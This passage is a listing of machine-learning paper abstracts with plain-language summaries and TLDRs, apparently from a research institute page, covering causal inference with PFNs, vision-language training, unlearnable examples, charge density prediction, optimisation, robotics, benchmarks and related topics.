Foundation models based on prior-data fitted networks (PFNs) have shown strong empirical performance in causal inference by framing the task as an in-context learning problem. However, it is unclear whether PFN-based causal estimators provide uncertainty quantification that is consistent with classical frequentist estimators. In this work, we address this gap by analyzing the frequentist consistency of PFN-based estimators for the average treatment effect (ATE). (1) We show that existing PFNs, when interpreted as Bayesian ATE estimators, can exhibit prior-induced confounding bias: the prior is not asymptotically overwritten by data, which, in turn, prevents frequentist consistency. (2) As a remedy, we suggest employing a calibration procedure based on a one-step posterior correction (OSPC). We show that the OSPC helps to restore frequentist consistency and can yield a semi-parametric Bernstein-von Mises theorem for calibrated PFNs (i.e., both the calibrated PFN-based estimators and the classical semi-parametric efficient estimators converge in distribution with growing data size). (3) Finally, we implement OSPC through tailoring martingale posteriors on top of the PFNs. In this way, we are able to recover functional nuisance posteriors from PFNs, required by the OSPC. In multiple (semi-)synthetic experiments, PFNs calibrated with our martingale posterior OSPC produce ATE uncertainty that (i) asymptotically matches frequentist uncertainty and (ii) is well calibrated in finite samples in comparison to other Bayesian ATE estimators.
Summary
Many decisions in medicine, public policy, and business depend on estimating what would happen if we changed an action, such as giving a treatment or introducing a policy. New AI systems called prior-data fitted networks can make these estimates quickly because they learn from many simulated datasets before seeing a real one. However, we found that these systems can be overconfident in causal settings: the simulated worlds used for training often contain too little confounding, meaning too few cases where treatment choices and outcomes are linked through shared background factors. As a result, the AI may underestimate how uncertain it should be about the true effect of an intervention. We propose a calibration method that adjusts the AI’s estimate using a correction inspired by classical causal inference. This correction makes the AI’s uncertainty behave more like uncertainty from well-established statistical estimators, while still keeping the speed and flexibility of prior-data fitted networks. To make the correction practical, we also show how to recover the needed uncertainty about hidden modeling components from the network’s predictions. Across several synthetic and semi-synthetic benchmarks, the corrected method provides more reliable uncertainty than naïvely using the networks as causal estimators. Our work shows that foundation models for tabular data can be useful for causal inference, but only when their uncertainty is carefully calibrated.
TLDR: We show that PFN-based ATE estimators can be frequentist-inconsistent due to prior-induced confounding, and we restore consistency and calibrated uncertainty via one-step posterior corrections using martingale posteriors.
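For readers unfamiliar with one-step corrections, the classical frequentist version (the augmented inverse-propensity-weighted estimator) can be sketched as follows. This is not the paper's OSPC or its martingale-posterior implementation; the simulated data, the known propensity score, and the deliberately crude constant outcome models are all assumptions chosen to show how the correction term removes confounding bias from a plug-in estimate.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 200_000
true_ate = 2.0

x = rng.standard_normal(n)                 # confounder
propensity = 1.0 / (1.0 + np.exp(-x))      # P(A = 1 | X = x), assumed known here
a = rng.binomial(1, propensity)            # treatment depends on x
y = true_ate * a + 3.0 * x + rng.standard_normal(n)

# Deliberately crude outcome models: one constant per arm, ignoring x.
mu1 = np.full(n, y[a == 1].mean())
mu0 = np.full(n, y[a == 0].mean())

# Plug-in estimate: biased, because x drives both treatment and outcome.
plug_in = np.mean(mu1 - mu0)

# One-step correction: inverse-propensity-weighted residuals of each arm.
correction = np.mean(
    a * (y - mu1) / propensity - (1 - a) * (y - mu0) / (1.0 - propensity)
)
one_step = plug_in + correction
print(plug_in, one_step)
```

In this simulation the plug-in estimate overshoots the true effect, while the corrected estimate lands close to it because the propensity score is correctly specified.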
From Seeing to Thinking: Decoupling Perception and Reasoning Improves Post-Training of Vision-Language Models
Juncheng Wu, Hardy Chen, Haoqin Tu, Xianfeng Tang, Freda Shi (Vector Faculty Member), Hui Liu, Hanqing Lu, Cihang Xie, Yuyin Zhou
Abstract
Recent advances in vision-language models (VLMs) emphasize long chain-of-thought reasoning; yet, we find that their performance on visual tasks is primarily limited by a lack of visual perception as opposed to reasoning itself. In this work, we systematically study the interplay between perception and reasoning in VLM post-training by decomposing their capabilities into three separate training stages: visual perception, visual reasoning, and textual reasoning, incorporating specialized training data. We demonstrate that visual perception (a) requires targeted optimization with specialized data; (b) serves as a fundamental scaffold that should be solidified through staged training before refining visual reasoning; and (c) is more effectively learned via RL than caption-based SFT. Our experiments across multiple VLMs demonstrate that staged training consistently improves both visual perception and reasoning performance over merged training. Notably, models trained with our approach achieve 1.5% higher reasoning accuracy with 20.8% shorter reasoning traces, suggesting that superior perception reduces the need for excessive reasoning. Furthermore, we show that this capability-based staging represents a new curriculum dimension orthogonal to traditional difficulty-based curricula, and combining both yields further additive gains. Our staged-training models achieve superior performance among open-weight VLMs, establishing advanced results on several visual math and perception tasks compared with the base counterpart (e.g., +5.2% on WeMath and +3.7% on RealWorldQA).
Summary
Modern AI systems can look at a picture and answer questions about it — for example, solving a geometry problem shown in a diagram. To make them better, researchers have mostly taught these systems to “think” longer, working through problems step by step. But when we examined where they go wrong, we found the real bottleneck was not faulty thinking but faulty seeing: in nearly 87% of mistakes, the model had simply misread the image. Worse, thinking harder did not help — once the model misread a picture, every extra step of reasoning was built on that same wrong observation. We argue that seeing should be treated as its own skill and trained separately, before reasoning. We built a training recipe that strengthens a model’s visual perception first, then layers reasoning on top, using dedicated data for each stage. We also created a way to turn captioned-image datasets into perception training data. Models trained this way are both more accurate and more efficient: they reason about 21% more concisely because they no longer need to second-guess what they saw. The lesson is simple — an AI that sees clearly does not need to overthink.
TLDR: See first, then think. Visual perception — not reasoning length — is the dominant bottleneck for VLMs. We post-train along a new capability axis, orthogonal to the classic difficulty curriculum.
FUSE: Full‑spectrum Unlearnable Examples via Spectral Equalization
Jiale Cai, Gezheng Xu, Zhihao Li, Ruiyi Fang, Ruizhi Pu, Di Wu, Qicheng Lao, Charles X. Ling, Boyu Wang (Vector Faculty Affiliate)
Abstract
Unlearnable examples (UEs) protect training data by injecting imperceptible perturbations so that models fail to extract exploitable representations. In this paper, we reveal that existing UEs exhibit a critical failure once low-pass filtering is applied, indicating that the effective perturbation signals for unlearnability concentrate predominantly in high frequencies. Hence, we argue that reliable UEs should remain effective across the full spectrum. To this end, we propose **F**ull-spectrum **U**nlearnable Examples via **S**pectral **E**qualization (**FUSE**), which aims to generate spectrum-agnostic perturbations by equalizing the contributions from different bands and enforcing cross-band consistency. Specifically, FUSE adopts a Random Spectral Masking (RSM) strategy during generator training, which randomly removes a contiguous frequency band, forcing the remaining bands to maintain unlearnability. In addition, FUSE further integrates Cross-Band Guidance (CBG), which enforces mutual consistency between high- and low-frequency components, thereby further enhancing low-frequency unlearnability and regulating high-frequency perturbations to preserve the semantic fidelity of images. Extensive experiments across multiple datasets, architectures, and spectral filtering demonstrate the strong protection achieved by FUSE.
Summary
Many modern AI systems are trained on large collections of online images, often without the creators’ knowledge or permission. One proposed way to protect such data is to slightly modify images so that the changes are invisible to humans but prevent AI models from learning useful information from them. These modified images are called unlearnable examples.
In this work, we show that many existing protection methods fail once images are slightly smoothed or compressed, because they mainly rely on fragile high-frequency signals that are easy to remove. To address this problem, we propose a new method called FUSE, which spreads the protective signal more broadly across the image instead of concentrating it in only one type of visual pattern. As a result, the protection remains effective even after common image processing operations.
We evaluate FUSE on multiple datasets and AI model architectures, and show that it consistently provides stronger and more reliable protection than previous approaches. Our findings suggest that future data protection methods should be designed to remain robust under realistic image transformations and processing conditions.
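The failure mode described above, where smoothing strips a high-frequency perturbation, can be illustrated with a toy frequency-domain low-pass filter. This is a sketch under assumptions: the checkerboard and cosine patterns are hypothetical stand-ins for high- and low-frequency perturbations, and the helpers `low_pass` and `energy_kept` are illustrative names, not part of FUSE.

```python
import numpy as np

def low_pass(img, cutoff):
    """Keep only 2-D Fourier components whose frequency radius is <= cutoff."""
    n, m = img.shape
    fy = np.fft.fftfreq(n) * n  # integer frequency indices along rows
    fx = np.fft.fftfreq(m) * m  # integer frequency indices along columns
    radius = np.sqrt(fy[:, None] ** 2 + fx[None, :] ** 2)
    spectrum = np.fft.fft2(img)
    return np.real(np.fft.ifft2(spectrum * (radius <= cutoff)))

def energy_kept(perturbation, cutoff):
    """Fraction of the perturbation's energy that survives the filter."""
    filtered = low_pass(perturbation, cutoff)
    return np.sum(filtered ** 2) / np.sum(perturbation ** 2)

i, j = np.indices((32, 32))
high_freq = (-1.0) ** (i + j)            # checkerboard: all energy at the highest frequency
low_freq = np.cos(2 * np.pi * i / 32)    # one slow oscillation across the image

print(energy_kept(high_freq, cutoff=8), energy_kept(low_freq, cutoff=8))
```

The checkerboard perturbation is removed almost entirely by the filter, while the slowly varying one passes through unchanged, which is why a perturbation spread across the spectrum is harder to erase.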
Global Plane Waves From Local Gaussians: Periodic Charge Densities in a Blink
Jonas Elsborg, Felix Aertebjerg, Luca Anthony Thiede, Alán Aspuru-Guzik (Vector Faculty Member), Tejs Vegge, Arghya Bhowmik
Abstract
We introduce ELECTRAFI, a fast, end-to-end differentiable model for predicting periodic charge densities in crystalline materials. ELECTRAFI constructs anisotropic Gaussians in real space and exploits their closed-form Fourier transforms to analytically evaluate plane-wave coefficients via the Poisson summation formula. This formulation delegates non-local and periodic behavior to analytic transforms, enabling reconstruction of the full periodic charge density with a single inverse FFT. By avoiding explicit real-space grid probing, periodic image summation, and spherical harmonic expansions, ELECTRAFI matches or exceeds state-of-the-art accuracy across periodic benchmarks while being up to $633\times$ faster than the strongest competing method, reconstructing crystal charge densities in a fraction of a second. When used to initialize DFT calculations, ELECTRAFI reduces total DFT compute cost by up to $\sim 20\%$, whereas slower charge density models negate savings due to high inference times. Our results show that accuracy and inference cost jointly determine end-to-end DFT speedups, and motivate our focus on efficiency.
Summary
Many important materials are first studied on computers before they are made in the lab. A common method for doing this is called density-functional theory, or DFT, which predicts how electrons are arranged inside a material. DFT is very useful, but it can be slow because the computer has to repeatedly refine the electron density until it finds a stable answer.
In this paper, we use machine learning to provide a much better starting guess, which helps the DFT calculations finish faster by starting closer to the true solution. The challenge is that the machine-learning model itself also has to be fast. If it is not, the time saved in DFT is lost when making the prediction. We built ELECTRAFI, a model that predicts electron densities in crystals using a large set of simple 3D “blobs” called Gaussians. Instead of checking every point in space one by one, ELECTRAFI converts these blobs directly into the mathematical format used by many DFT programs. This makes the prediction both naturally periodic, like a crystal, and very fast.
We found that ELECTRAFI is as accurate as the best existing methods while being hundreds of times faster. When used inside real DFT calculations, it reduces the total compute time by up to about 20%.
This is significant because billions of compute hours are spent globally on DFT calculations each year, and methods like ELECTRAFI can help make large-scale materials simulation faster, cheaper, and less energy-intensive.
TLDR: Ultra-fast charge density prediction in periodic systems.
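The Poisson summation idea in the abstract can be checked numerically in one dimension. The sketch below is a simplification under assumptions: a single isotropic Gaussian in a 1-D cell (the paper uses anisotropic Gaussians in 3-D crystals), with illustrative values for the cell length, grid size, centre, and width. It compares the density obtained from analytic Fourier coefficients and one inverse FFT against an explicit sum over periodic images.

```python
import numpy as np

L, N = 1.0, 64            # cell length and grid size (illustrative values)
mu, sigma = 0.3, 0.05     # centre and width of one normalised Gaussian

# Analytic plane-wave coefficients: the Fourier transform of a Gaussian is a Gaussian.
k = np.fft.fftfreq(N) * N                 # integer wave numbers in FFT order
omega = 2 * np.pi * k / L
coeffs = np.exp(-0.5 * (sigma * omega) ** 2) * np.exp(-1j * omega * mu) / L

# One inverse FFT reconstructs the periodic density on the whole grid.
rho_fft = N * np.fft.ifft(coeffs).real

# Reference: explicit summation over periodic images of the same Gaussian.
x = np.arange(N) * L / N
images = range(-5, 6)
rho_sum = sum(np.exp(-0.5 * ((x - mu + n * L) / sigma) ** 2) for n in images)
rho_sum = rho_sum / (np.sqrt(2 * np.pi) * sigma)

print(np.max(np.abs(rho_fft - rho_sum)))
```

The two densities agree to numerical precision, and the FFT route never loops over periodic images or probes grid points one by one.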
Gradient Smoothing: Coupling Layer-wise Updates for Improved Optimization
Haoming Meng, Anton Sugolov, Vardan Papyan (Vector Faculty Member)
Abstract
Deep neural networks with repeated blocks, such as transformers and ResNets, often exhibit structured relationships across layers that emerge during training. Motivated by this observation, we introduce a general paradigm of *Depth-wise Gradient Augmentation*, in which the update applied to a layer may depend on the base optimizer updates computed for other layers. We study an instantiation of this idea, termed *Gradient Smoothing*, which couples optimizer updates across depth and admits a natural interpretation as a structured preconditioning method. Our framework operates directly on block-wise update vectors produced by arbitrary base optimizers (e.g., SGD, Adam, Muon), applying structured depth-wise smoothing operators such as local weighted averaging with minimal computational overhead. We evaluate Gradient Smoothing across a diverse set of architectures and training regimes, including language model pretraining, RL post-training of LLMs on reasoning tasks, diffusion modeling, and image classification with Vision Transformers. Across these settings, Gradient Smoothing consistently improves convergence and generalization performance without modifying model architectures or training objectives. We further show that smoothing promotes more structured representation evolution across depth, suggesting a connection between structured update coupling and the internal organization of learned representations. These results position Gradient Smoothing as a simple and broadly applicable approach for improving training in modern deep networks.
Summary
Modern AI systems such as large language models, vision transformers, and diffusion models are built from many repeated architectural layers. Although these layers often learn related behaviors during training, today’s optimization algorithms typically update each layer independently.
We introduce a new training framework called Depth-wise Gradient Augmentation, which allows layers to share information through their optimization updates. We study a simple instance of this idea called Gradient Smoothing, where updates from neighboring layers are combined before being applied to the model.
Gradient Smoothing can be added on top of existing training methods with very little computational cost and does not require changing the model architecture or training objective. We tested the method on a wide range of machine learning tasks, including language model pretraining, reasoning-focused reinforcement learning, image classification, and image generation.
Across these settings, Gradient Smoothing consistently improved training efficiency and model performance. We also found that it encourages representations to evolve more smoothly and coherently across layers. These results suggest that leveraging the structure shared across layers can be a simple and broadly useful way to train modern deep learning systems more effectively.
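Local weighted averaging of updates across depth can be sketched in a few lines. This is a minimal illustration under assumptions: every layer's update has the same shape (as with repeated blocks), the kernel weights `(0.25, 0.5, 0.25)` and the renormalisation at the first and last layers are hypothetical choices, and `smooth_updates` is an illustrative name rather than the authors' implementation.

```python
import numpy as np

def smooth_updates(updates, weights=(0.25, 0.5, 0.25)):
    """Average each layer's update with its neighbours along the depth axis.

    `updates` has shape (depth, ...): one base-optimizer update per layer.
    Weights falling outside the network are dropped and the rest renormalised.
    """
    updates = np.asarray(updates, dtype=float)
    depth = updates.shape[0]
    half = len(weights) // 2
    smoothed = np.zeros_like(updates)
    for layer in range(depth):
        total = 0.0
        for offset, w in zip(range(-half, half + 1), weights):
            neighbour = layer + offset
            if 0 <= neighbour < depth:
                smoothed[layer] += w * updates[neighbour]
                total += w
        smoothed[layer] /= total
    return smoothed

# Five layers, one parameter each; only the middle layer has a non-zero update.
spike = np.array([[0.0], [0.0], [4.0], [0.0], [0.0]])
print(smooth_updates(spike).ravel())  # [0. 1. 2. 1. 0.]
```

Because the operator acts on the updates themselves, it could sit on top of any base optimizer that produces per-layer update vectors.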
Hierarchical Policy Learning via Spectral Decomposition
Shuxin Cao, Liquan Wang, Walker Byrnes, Yiye Chen, Yilun Du, Animesh Garg (Vector Faculty Affiliate)
Abstract
In this paper, we identify a semantic decomposition in robot action sequences, separating task-level motion intent from execution-level refinements. By analyzing actions in the spectral domain using the discrete cosine transform (DCT), we observe that low-frequency components capture global motion trajectories, while high-frequency components encode precise timing, alignment, and contact behaviors. Motivated by this structure, we propose Causal Spectral Policy (CSP), which models action generation as a causal coarse-to-fine process: coarse motion is predicted from observation and language, and fine corrections are generated conditionally on the realized trajectory. Across simulation and real-world evaluations, CSP consistently outperforms strong baselines on precision-sensitive manipulation tasks. Additionally, we propose human-inspired teleoperation noise injection as a data augmentation method under which our approach demonstrates strong robustness to noisy demonstrations.
Summary
Teaching robots to manipulate objects precisely is hard because good motion requires both a correct overall trajectory and tiny last-moment corrections, and these two things need to be learned differently. We show that converting robot movements into frequency components naturally separates these two levels. Our method, CSP, learns coarse motion first, then generates fine corrections conditioned on it. This improves performance on precision tasks and makes learning more robust to the noisy demonstrations that arise when humans operate robots remotely.
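The frequency split described above can be sketched with an orthonormal DCT-II applied along the time axis of an action sequence. The trajectory, the jitter amplitude, and the cutoff `n_low` below are assumptions for illustration, and `dct_matrix` and `split_actions` are hypothetical helpers; the sketch shows only the decomposition, not the CSP policy itself.

```python
import numpy as np

def dct_matrix(n):
    """Orthonormal DCT-II matrix of size n x n (rows are cosine basis vectors)."""
    k = np.arange(n)[:, None]
    t = np.arange(n)[None, :]
    D = np.sqrt(2.0 / n) * np.cos(np.pi * (t + 0.5) * k / n)
    D[0] /= np.sqrt(2.0)
    return D

def split_actions(actions, n_low):
    """Split a (time, dof) action sequence into coarse and fine parts."""
    D = dct_matrix(actions.shape[0])
    coeffs = D @ actions          # spectrum along the time axis
    low = coeffs.copy()
    low[n_low:] = 0.0             # keep only the lowest n_low frequencies
    coarse = D.T @ low            # inverse transform (D is orthogonal)
    return coarse, actions - coarse

steps = 32
t = np.linspace(0.0, 1.0, steps)
reach = np.sin(0.5 * np.pi * t)                 # smooth global motion
jitter = 0.02 * (-1.0) ** np.arange(steps)      # rapid small corrections
actions = (reach + jitter)[:, None]             # shape (time, 1 degree of freedom)

coarse, fine = split_actions(actions, n_low=4)
print(np.linalg.norm(coarse), np.linalg.norm(fine))
```

The coarse part carries the overall reach and the fine part carries the small rapid adjustments, and the two always sum back to the original sequence.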
IDRBench: Understanding the Capability of Large Language Models on Interdisciplinary Research
Yuanhao Shen, Daniel de Sousa, Ricardo de Andrade Nascimento, Hongyu Guo, Xiaodan Zhu (Vector Faculty Member)
Abstract
Innovation is a key driving force of human civilization. As the body of knowledge has grown considerably, bridging knowledge across different disciplines, where significant innovation often emerges, has become increasingly challenging. The recent advancements in machine learning models, particularly Large Language Models (LLMs), have provided effective access to extensive knowledge sources and shown impressive abilities in reasoning, rendering significant opportunities for interdisciplinary discovery. Our research aims to understand the capabilities of state-of-the-art LLMs in integrating knowledge from different fields for interdisciplinary research (IDR). To address this fundamental problem, we introduce IDRBench, a pioneering framework that includes both datasets and evaluation tasks: (1) IDR Paper Identification, (2) IDR Idea Integration, and (3) IDR Idea Recommendation. Our study on ten mainstream LLMs provides a comprehensive analysis of their behavior and establishes benchmarks and baselines for future research. To the best of our knowledge, IDRBench is the first to provide a comprehensive investigation of LLMs’ IDR capability.
Summary
Many important discoveries happen when ideas from different fields are brought together, but finding meaningful connections across disciplines is becoming harder as scientific knowledge keeps growing. Large language models, such as ChatGPT-like systems, can read and reason over large amounts of text, so they may help researchers discover connections that would otherwise be missed. However, we still do not know how well these models can actually understand, evaluate, and recommend interdisciplinary research ideas.
In this work, we introduce IDRBench, a new benchmark for testing whether large language models can support interdisciplinary discovery. IDRBench evaluates models on three tasks: identifying interdisciplinary papers, explaining how ideas from different fields can be integrated, and recommending promising cross-disciplinary research directions. We use this benchmark to study ten widely used language models and compare their strengths and weaknesses.
Our results provide the first comprehensive picture of how current language models perform on interdisciplinary research tasks. This work can help researchers better understand when LLMs are useful for scientific discovery, where they still fail, and how future AI tools for research can be improved.
TLDR: We introduce a novel benchmark to understand LLMs’ interdisciplinary research capabilities.
Inverse Entropic Optimal Transport Solves Semi-supervised Learning via Data Likelihood Maximization
Mikhail Persiianov, Arip Asadulaev, Nikita Andreev, Nikita Starodubcev, Dmitry Baranchuk, Anastasis Kratsios (Vector Faculty Affiliate), Evgeny Burnaev, Aleksandr Korotin
Abstract
Learning conditional distributions $\pi^\star(\cdot|x)$ is a central problem in machine learning, which is typically approached via supervised methods with paired data $(x,y) \sim \pi^\star$. However, acquiring paired data samples is often challenging, especially in problems such as domain translation. This necessitates the development of *semi-supervised* models that utilize both limited paired data and additional unpaired i.i.d. samples $x \sim \pi^\star_x$ and $y \sim \pi^\star_y$ from the marginal distributions. The usage of such combined data is complex and often relies on heuristic approaches. To tackle this issue, we propose a new learning paradigm that integrates both paired and unpaired data seamlessly using data likelihood maximization techniques. We demonstrate that our approach also connects intriguingly with inverse entropic optimal transport (OT). This finding allows us to apply recent advances in computational OT to establish an *end-to-end* learning algorithm to get $\pi^\star(\cdot|x)$. In addition, we derive the universal approximation property, demonstrating that our approach can theoretically recover true conditional distributions with arbitrarily small error. Finally, we demonstrate through empirical tests that our method effectively learns conditional distributions using paired and unpaired data simultaneously.
Summary
Machine learning systems often need to learn relationships between two types of data. For example, a system may need to translate images between styles, predict weather conditions from sensor measurements, or generate outputs based on limited examples. Most existing methods require large collections of perfectly matched input-output pairs for training. However, in many real-world applications, such paired data is expensive or difficult to obtain, while separate collections of inputs and outputs are much easier to collect.
In this work, we introduce a new method that can learn from both a small amount of paired data and a large amount of unpaired data at the same time. Our approach is based on maximizing how well the model explains the observed data, while also drawing inspiration from optimal transport, a mathematical framework for comparing and transforming probability distributions.
We show theoretically that our method can recover complex relationships between domains and provide an efficient algorithm for training it in practice. In experiments on synthetic tasks, weather prediction, image translation, and classification, our approach consistently outperforms existing semi-supervised methods, especially when only a limited number of paired examples are available. For example, our method can learn realistic image translations and accurate probabilistic weather forecasts while requiring substantially less paired supervision than standard approaches.
Our findings suggest that combining paired and unpaired data through principled likelihood-based learning can significantly improve data efficiency and reliability in machine learning systems.
Local MAP Sampling for Diffusion Models
Shaorong Zhang, Rob Brekelmans (former Vector Distinguished Postdoctoral Fellow), Greg Ver Steeg
Abstract
Diffusion Posterior Sampling (DPS) provides a principled Bayesian approach to inverse problems by sampling from $p(x_0 \mid y)$. While posterior sampling is valuable for capturing uncertainty and multi-modality, many classical and practical inverse problem settings ultimately prioritize accurate point estimation, most notably the MAP estimator, which has long served as a standard reconstruction objective in imaging and scientific applications. We introduce Local MAP Sampling (LMAPS), a new inference framework that iteratively solves local MAP subproblems along the diffusion trajectory. This perspective clarifies their connection to global MAP and DPS, offering a unified probabilistic interpretation for optimization-based methods. Building on this foundation, we develop practical algorithms with a covariance approximation motivated by a Gaussian prior assumption and a reformulated objective for stability and interpretability. Across a broad set of image restoration and scientific tasks, LMAPS achieves state-of-the-art performance.
Summary
AI systems called diffusion models can generate highly realistic images by gradually turning random noise into structured content. Beyond creating images from scratch, they are increasingly used to solve “inverse problems” — tasks such as sharpening blurry photos, filling in missing regions of an image, reconstructing MRI scans from limited measurements, or imaging black holes from sparse radio telescope data. We introduce Local MAP Sampling (LMAPS), a method that at every step of the diffusion process searches for the single most likely clean image consistent with both the current noisy state and the observed measurement. This perspective unifies and clarifies several earlier approaches under one principled framework. Across a wide range of image restoration tasks and scientific problems — including MRI reconstruction and black hole imaging — LMAPS produces sharper and more accurate reconstructions than existing methods, often at lower computational cost.
Long Grounded Thoughts: Synthesizing Grounded Visual Problems and Distilling Reasoning Chains at Scale
David Acuna, Chao-Han Huck Yang, Yuntian Deng (Vector Faculty Affiliate), Jaehun Jung, Ximing Lu, Prithviraj Ammanabrolu, Hyunwoo Kim, Yuan-Hong Liao, Yejin Choi
Abstract
Despite rapid progress, multimodal reasoning still lacks a systematic approach to synthesize large-scale vision-centric datasets beyond visual math. We introduce a framework able to synthesize vision-centric problems spanning diverse levels of complexity, and the resulting dataset with over 1M high-quality problems including: reasoning traces, preference data, and instruction prompts supporting SFT, offline and online RL. Our vision-centric synthesis framework uses a two-stage process focusing on: (1) generating diverse verifiable questions from existing images at scale, and (2) creating complex compositional visual problems by merging simpler questions.
Remarkably, finetuning Qwen2.5-VL-7B on our data outperforms existing open-data baselines across evaluated vision-centric benchmarks, and our best configurations match or surpass strong closed-data models such as MiMo-VL-7B-RL on V*Bench, CV-Bench and MMStar-V. Notably, despite being entirely vision-centric, our data transfers positively to text-only reasoning (MMLU-Pro, +3.7%) and audio reasoning (MMAU, +1.32%), demonstrating its effectiveness. Similarly, despite containing no embodied visual data, we observe notable gains (NiEH, +8.8%) when evaluating open-ended embodied QA. Lastly, we use our data to comprehensively analyze at scale (1M+) the entire VLM post-training pipeline showing that (i) SFT on high-quality data with cognitive behaviours on reasoning traces is essential to scale online RL, (ii) offline RL could match online RL’s performance while disaggregating compute demands, and (iii) SFT on high-quality data also improves out-of-domain, cross-modality transfer.
Summary
This work introduces a way to automatically create over one million image-based questions that help multimodal AI systems reason better about what they see. By focusing on specific objects and combining simple questions into harder ones, the method generates data that teaches models to reason about what they see, check their answers, and recover from mistakes. This improves performance on visual tasks and also benefits text, audio, and embodied reasoning.
TLDR: A data generation framework to synthesize vision-centric problems spanning diverse levels of complexity, and a dataset with over 1M high-quality problems supporting SFT, offline and online RL.
The Mechanistic Emergence of Symbol Grounding in Language Models
Shuyu Wu, Ziqiao Ma, Xiaoxi Luo, Yidong Huang, Josue Torres-Fonseca, Freda Shi (Vector Faculty Member), Joyce Chai
Abstract
Symbol grounding (Harnad, 1990) describes how symbols such as words acquire their meanings by connecting to real-world sensorimotor experiences. Recent work has shown preliminary evidence that grounding may emerge in (vision-)language models trained at scale without using explicit grounding objectives. Yet, the specific loci of this emergence and the mechanisms that drive it remain largely unexplored. To address this problem, we introduce a controlled evaluation framework that systematically traces how symbol grounding arises within the internal computations through mechanistic and causal analysis. Our findings show that grounding concentrates in middle-layer computations and is implemented through the aggregate mechanism, where attention heads aggregate the environmental ground to support the prediction of linguistic forms. This phenomenon replicates in multimodal dialogue and across architectures (Transformers and state-space models), but not in unidirectional LSTMs. Our results provide behavioural and mechanistic evidence that symbol grounding can emerge in language models, with practical implications for predicting and potentially controlling the reliability of generation.
Summary
When people use a word like “horse”, its meaning is tied to things they have seen or experienced in the world. This connection between words and evidence from the world is referred to as grounding. In this work, we investigate if language models can do the same: we ask whether it is possible for grounding to emerge on its own during ordinary training, and if so, how. We study this question by creating controlled situations where the same idea appears in two separate forms: one as part of the environment and one as ordinary language. For example, a model may see evidence about a horse and then be asked to predict the word “horse” in a sentence. We compare cases where the evidence matches the word with cases where it does not, and we examine the model to identify which parts facilitate the correct prediction. We find that most modern model architectures, including transformers, learn this connection during ordinary training, even without being explicitly told which words match which evidence. The connection is strongest in the middle of the model and is carried by attention patterns that bring relevant environmental information to the word being predicted. We observe similar behavior in text-based and image-based dialogue settings, though not in a simpler recurrent model. These findings help explain how grounding can arise in language models and may offer tools for detecting or reducing unreliable language model generations.
TLDR: We provide behavioral and mechanistic evidence that symbol grounding can emerge in (multimodal) language models.
Motion Attribution for Video Generation
Spotlight paper
Xindi Wu, Despoina Paschalidou, Jun Gao, Antonio Torralba, Laura Leal-Taixé, Olga Russakovsky, Sanja Fidler (Vector Faculty Member), Jonathan Lorraine
Abstract
Despite the rapid progress of video generation models, the role of data in influencing motion is poorly understood. We present Motive (MOTIon attribution for Video gEneration), a motion-centric, gradient-based data attribution framework that scales to modern, large, high-quality video datasets and models. We use this to study which fine-tuning clips improve or degrade temporal dynamics. Motive isolates temporal dynamics from static appearance via motion-weighted loss masks, yielding efficient and scalable motion-specific influence computation. On text-to-video models, Motive identifies clips that strongly affect motion and guides data curation that improves temporal consistency and physical plausibility. With Motive-selected high-influence data, we improve both motion smoothness and dynamic degree on VBench, achieving a 74.1% human preference win rate compared with the pretrained base model. To our knowledge, this is the first framework to attribute motion rather than visual appearance in video generative models and to use it to curate fine-tuning data.
Summary
AI video generators are getting impressive, but their motion still looks off: characters drift, objects fly by impossibly, and the physics breaks down in ways that humans immediately notice. We have no clear way to ask which training videos taught a model these bad habits, or which ones could fix them. Most existing tools for tracing how training data shapes outputs were built for still images, where there is no motion to explain.
We built MOTIVE, the first method that traces a generated video’s motion back to the specific training clips that influenced it, independent of the scene’s appearance. MOTIVE focuses on the moving parts of each video and asks how strongly each training clip pushed the model toward producing that kind of motion. Because the scores are motion-specific, we can pick out the small slice of training data, about one clip in a hundred, that most improves how the model moves.
When we retrained a popular open-source video generator on just that top slice, human viewers preferred its motion 74% of the time. MOTIVE gives video-model developers a practical way to curate better training sets, producing smoother, more physically plausible videos without requiring additional data collection.
TLDR: We propose Motive, a scalable, motion-centric data attribution framework for video generation to identify which training clips improve or degrade motion dynamics, enabling curation and more.
MultiLoReFT: Decoupling Shared and Modality-Specific Subspaces in Multimodal Learning via Low-Rank Representation Fine-Tuning
Sana Tonekaboni (Vector Distinguished Postdoctoral Fellow), Viktoria Schuster, Caroline Uhler
Abstract
Real-world perception and decision making are inherently multimodal, integrating complementary signals across modalities. However, training multimodal models faces two main obstacles. First, collecting large-scale, well-aligned paired multimodal datasets is often impractical, making end-to-end multimodal training difficult. Second, existing multimodal representations frequently entangle information shared across modalities with modality-specific information, hindering interpretability and control. We introduce MultiLoReFT, an efficient and scalable low-rank representation fine-tuning framework for multimodal learning with pretrained unimodal models. MultiLoReFT extends low-rank adaptation to the multimodal setting and learns interpretable projection subspaces that decouple shared and modality-specific information. Across simulated and real-world benchmarks, it produces representations that support multimodal prediction while explicitly revealing how shared and modality-specific information is distributed across modalities.
Summary
MultiLoReFT is a framework for building multimodal AI models from pretrained models that already understand individual data types, such as text, audio, or images. Instead of training a large multimodal model from scratch, it efficiently fine-tunes these existing representations using a compact low-rank approach. Its main goal is interpretability: it separates information that is shared across modalities from information that is specific to each modality, making it clearer what each data source contributes and what patterns the model relies on. Across simulated and real-world tasks, MultiLoReFT supports accurate multimodal prediction while providing a more transparent view of how multimodal information is organized.
TLDR: Parameter efficient fine-tuning for multimodal representation learning with improved interpretability.
Needles in the Haystack: Addressing Signal Dilution Improves scRNA-seq Perturbation Response Modeling and Evaluation
Gabriel Mejia, Henry Miller, Francis Leblanc, Bo Wang (Vector Faculty Member), Brendan Swain, Lucas Paulo de Lima Camillo
Abstract
Recent benchmarks reveal that single-cell perturbation response models are often outperformed by simply predicting the dataset mean. Through large-scale *in silico* simulations, together with analyses of two real-world perturbation datasets, we trace this anomaly to a metric artifact: unweighted error metrics systematically reward mean predictions when perturbation effects are sparse. To address this limitation, we introduce differentially expressed gene (DEG)-aware metrics—weighted mean-squared error (WMSE) and weighted delta $R^{2}$ ($R^{2}_{w}(\Delta)$)—that sensitively measure error in niche, perturbation-specific signals. We further propose explicit negative and positive performance baselines to calibrate these metrics. Under this framework, the mean baseline sinks to null performance, while genuinely informative predictors are correctly rewarded. Finally, we show that using WMSE as a training objective reduces mode collapse and improves predictive performance across multiple model architectures.
Summary
